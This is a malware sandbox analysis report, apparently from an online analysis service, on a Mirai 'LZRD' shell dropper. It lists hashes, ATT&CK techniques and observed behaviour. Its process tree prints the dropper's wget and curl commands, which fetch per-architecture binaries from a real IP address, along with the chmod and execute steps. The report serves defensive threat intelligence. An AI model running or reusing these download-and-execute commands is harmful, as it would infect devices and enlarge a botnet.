mirai | ea0bdc1803529bcfa0f6188c15a373ae977699e7f6362d3cc34797c3f857a5d4

Analysis

max time kernel
138s
max time network
152s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02/12/2024, 19:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

044a846325b0a1a2a62139e419e0c460
SHA1

b7ba7d24f534c02b73c5e292364f0ba51ce10d79
SHA256

ea0bdc1803529bcfa0f6188c15a373ae977699e7f6362d3cc34797c3f857a5d4
SHA512

8a450e41d886ba67a5044da06f82bac2a3a78874199eb3af57576316b645dfd414bddedc942cde7a047351b88a68b616584182e3fa1242a1237287770401ff1c

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
887	chmod
868	chmod
775	chmod
740	chmod
728	chmod
752	chmod
831	chmod
856	chmod
874	chmod
881	chmod
703	chmod
722	chmod
763	chmod
820	chmod
714	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	704	Chaotic
/tmp/Chaotic	715	Chaotic
/tmp/Chaotic	723	Chaotic
/tmp/Chaotic	729	Chaotic
/tmp/Chaotic	741	Chaotic
/tmp/Chaotic	753	Chaotic
/tmp/Chaotic	764	Chaotic
/tmp/Chaotic	777	Chaotic
/tmp/Chaotic	821	Chaotic
/tmp/Chaotic	832	Chaotic
/tmp/Chaotic	857	Chaotic
/tmp/Chaotic	869	Chaotic
/tmp/Chaotic	875	Chaotic
/tmp/Chaotic	882	Chaotic
/tmp/Chaotic	888	Chaotic

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 6 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/675/status	Chaotic
File opened for reading	/proc/809/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/788/status	Chaotic
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/18/status	Chaotic
File opened for reading	/proc/441/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/137/status	Chaotic
File opened for reading	/proc/778/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/675/status	Chaotic
File opened for reading	/proc/21/status	Chaotic
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/27/status	Chaotic
File opened for reading	/proc/836/status	Chaotic
File opened for reading	/proc/41/status	Chaotic
File opened for reading	/proc/42/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/150/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/145/status	Chaotic
File opened for reading	/proc/429/status	Chaotic
File opened for reading	/proc/9/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/441/status	Chaotic
File opened for reading	/proc/672/status	Chaotic
File opened for reading	/proc/717/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/782/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/149/status	Chaotic
File opened for reading	/proc/673/status	Chaotic
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/293/status	Chaotic
File opened for reading	/proc/self/exe	Chaotic
File opened for reading	/proc/5/status	Chaotic
File opened for reading	/proc/26/status	Chaotic
File opened for reading	/proc/318/status	Chaotic
File opened for reading	/proc/98/status	Chaotic
File opened for reading	/proc/291/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/836/status	Chaotic
File opened for reading	/proc/318/status	Chaotic
File opened for reading	/proc/809/status	Chaotic
File opened for reading	/proc/489/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/145/status	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/137/status	Chaotic
File opened for reading	/proc/24/status	Chaotic
File opened for reading	/proc/222/status	Chaotic
File opened for reading	/proc/24/status	Chaotic
File opened for reading	/proc/717/status	Chaotic
File opened for reading	/proc/629/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
743	wget
746	curl
750	cat
731	wget
734	curl
738	cat

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:675
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:677
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:683
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:701
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:703
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:704
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:707
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:711
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:713
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:714
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:715
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:719
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:720
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:721
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:722
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:723
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:725
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:726
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:727
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:729
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:738
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:741
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:743
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:750
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:753
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:754
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:757
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:762
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:764
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:767
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:770
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:774
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:777
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:810
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:813
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:818
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:821
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:822
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:826
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:830
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-XPzMOh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:832
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:853
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:854
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:855
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:857
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:865
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:867
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:869
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:871
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:873
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:875
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:876
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:877
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:879
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:882
- /usr/bin/wget
  wget http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:884
- /usr/bin/curl
  curl -O http://154.213.187.149/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:885
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:886
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
a2a4d994986e8faf41f6a93465b5ebb7

SHA1
ec7cfe849e03096972d3f007f1356a993bfc0f87

SHA256
d01b8d4af85a0a32855a213d123da5621be7d41c0d4ee945369385efd6e9aa05

SHA512
010daa429992b6a3a6f9414b085d46eb017a956f7e53f5042b1a5e914544cb0d61af8ba4b4b5b77b5c0ce22ddbb80b6e14771fb2b2e0253bb6a64826fc4d57f2

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
9e7bb41e42c7504efec7e836e163fe46

SHA1
549e82f396bff90ac4e3fce59d6c46eadf787ea0

SHA256
9400da273f496e0bd69a0d23db54b495cefbd53d8248ea29ac8bd694c76ea61c

SHA512
71f9cff71695d2ef4302f65d1d0d29c81d22055acfebab07756312bfe5b8a23d599fb1c516bf91627ca81c4a22131328ae47b23b903a2eb84eac0ac05fc433db

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
7806468efe77931f499d3745d05f663a

SHA1
9857a3d135af76c71752f32cf8af92187dc8dec5

SHA256
0bb7782c1cf7f1db17bd26aa749d344c34af7ee0ea97fcdbff439ed8cac2919a

SHA512
c436119fc2b130ce64c25f76eee3b8402795d3362ebab5445c87f5001d85b214fa3dd89270aa60036ee7cd8d584ba75c98444e9364d4d69849fbcde9bbe7387e

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
d2465eef57eedb6d448b73a3d9dd5ff8

SHA1
1a3158635d76b4ddbb98c68ed4117537d980613d

SHA256
1a9ca051ddcecd5b4af6aa14d6cea45855e1080790492cf4ee85472ec44054b2

SHA512
35db42f35d09fc14122914ba967d7462e64005f608f35ec60e7931ec8a48c64361b95dc84202db8b897c10549db8618eabfe6700bd0d7b53f75230db8ba28189

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
605f83cafa6c73cc8f1a33471e895f26

SHA1
78f46431f57eab5dbba7b8c5ed4f247d224d70d2

SHA256
571bf88bb53f14ccfca66cadbd9e06843afd1541e91cdc722a18bb5d2fa57561

SHA512
ab69a449bcabc7991ad4502c80d335710186617255aa65fc585a4e54dcf003f4759f93c6ec39f0c152cc9e6c3b7596ed246576bcdb94f54924ee1a6d1eba40b0

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
8cdbb53e27e069f0f5b84f23670b778f

SHA1
9192d6cbb193b78a702a1c386a147c86cbd33619

SHA256
c5ded3bbea87c4329b2326e65755ec99841a393472d17297c342ee32f48b31e9

SHA512
bf393682182c5c4d36d05e646498548c9f0628bc286eb3a74c7892ab868fa2446144d45dd1530517f620b505e82fcc688a03e8eb9a8b7bc8e9ef73efa693e669

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

